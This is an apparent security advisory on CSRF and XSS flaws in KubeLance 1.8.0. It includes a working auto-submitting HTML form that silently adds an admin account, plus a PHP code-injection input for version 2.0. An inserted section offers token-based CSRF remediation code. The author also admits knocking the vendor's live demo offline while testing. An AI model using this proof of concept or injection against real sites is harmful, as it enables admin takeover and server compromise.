KubeLance version 1.8.0 suffers from cross site request forgery and cross site scripting vulnerabilities.
51dcf4384325da76c8289360ea5b3b8ef3f382dde1c945067852c350f0657760
===========================================================
Vulnerable Software: KubeLance: 1.8.0
Official Site: kubelabs.com
===========================================================
Vuln Desc:
KubeLance 1.8.0 suffers from multiple CSRF and XSS/HTML injection vulnerabilities.
Below I'll show you ONLY CSRF exploitation, but combining it with an XSS payload is possible and exploitable.
(To exploit CSRF+XSS, simply change the form fields and corresponding values to an XSS payload, that's all.)
===========================================================
Possible uses of the CSRF vuln in this situation:
Possible #1:
Forcing the admin to log out:
http://demos.kubelabs.com/kubelance/adm/logout.php
Possible #2:
Changing the admin username and password:
adm/admin_edit.php?id=1
Possible #3:
Clearing the logs:
/adm/log_viewer.php?clear=1
etc.
===========================================================
/*Will affect*/
If a currently logged-in admin visits a crafted page which contains the POC code,
the admin will be pwned ASAP.
===========================================================
Demo: http://demos.kubelabs.com/kubelance/
Just one POC:
============================== BEGIN OF PROOF OF CONCEPT EXPLOIT ===================================
<html>
<head>
<title>KubeLance: 1.8.0 CSRF exploitation POC</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<p>KubeLance: 1.8.0 CSRF ADD ADMIN POC</p>
<form name="form1" method="post" action="http://CHANGE_TO_RTARGET/kubelance/adm/admin_add.php">
<input name="username" type="hidden" class="textbox" id="username" style="width:60%" value="me">
<input name="password" type="hidden" class="textbox" id="password" style="width:60%" value="me">
</form>
<!-- Username:me -->
<!-- Password:me -->
</body>
</html>
============================== END OF PROOF OF CONCEPT EXPLOIT ===================================
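The POC above works because adm/admin_add.php accepts a POST from any origin as long as the admin's session cookie rides along, and the other listed endpoints (logout.php, admin_edit.php?id=1, log_viewer.php?clear=1) change state on a plain GET. The following is an added example of how such an admin handler can be fixed with a per-session synchronizer token; it is not KubeLance code, and the file name admin_add.php, the field names and the session key csrf_token are assumptions for illustration:

```php
<?php
// Added example (not KubeLance's own code): synchronizer-token CSRF
// protection for an admin form handler such as adm/admin_add.php.
session_start();

// Return the session's CSRF token, creating a random one on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 random bytes from the CSPRNG, hex-encoded (64 chars).
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only if the submitted token exists and matches the session token.
// hash_equals() compares in constant time, so timing does not leak the token.
function csrf_check(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// State-changing work happens only on POST, and only with a valid token.
// A cross-site form (like the POC) cannot read the victim's session token,
// so its submission is rejected here before any user is created.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... create the admin user from $_POST['username'] / $_POST['password'] ...
    // (omitted: the original handler's database logic)
}

// When rendering the form, embed the token as a hidden field.
// Anything echoed into HTML is escaped with htmlspecialchars(), which also
// closes the HTML/XSS injection the advisory mentions for reflected values.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form method="post" action="admin_add.php">
  <input type="hidden" name="csrf_token" value="<?= $token ?>">
  <input name="username" type="text">
  <input name="password" type="password">
  <button type="submit">Add admin</button>
</form>
```

The same check belongs on logout.php, admin_edit.php and log_viewer.php once they are switched from GET to POST, since a GET URL can be triggered by a simple image tag with no form at all. Setting the session cookie with the SameSite attribute (session_set_cookie_params(['samesite' => 'Lax']) on PHP 7.3 or later) is a useful second layer, but it does not replace the token check.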
Note1: Previous versions may also be affected, but I have not tested them.
Note2:
In the wild: I found a site which uses Kubelance CMS whose *includes/config.php* says it is:
$config['version'] = '2.0';
6149742 -rw-r--r-- 1 ************** apache 2854 Apr 9 2010 config.php
Version 2 (but I can't find that exact version on the vendor site).
Just note: that version ($config['version'] = '2.0';) is prone to PHP code execution.
(The signup First name and Last name sections (input boxes) can be injected with PHP code,
e.g.:
<?php phpinfo();?>
On submit this gives an error, and as a result the PHP code executes on the server side:
http://s019.radikal.ru/i618/1203/14/0ab995b456cd.png
Beware, anyone who uses that version: update your software ASAP and check your site for backdoors, change all your configs, cPanel and FTP passwords,
email passwords, and never use the same password everywhere.
My apologies to the Kubelance guys:
While testing it online (http://demos.kubelabs.com/kubelance/) I took it down by mistake :D
Sorry 1000 times for this :(
Peace
/AkaStep ^_^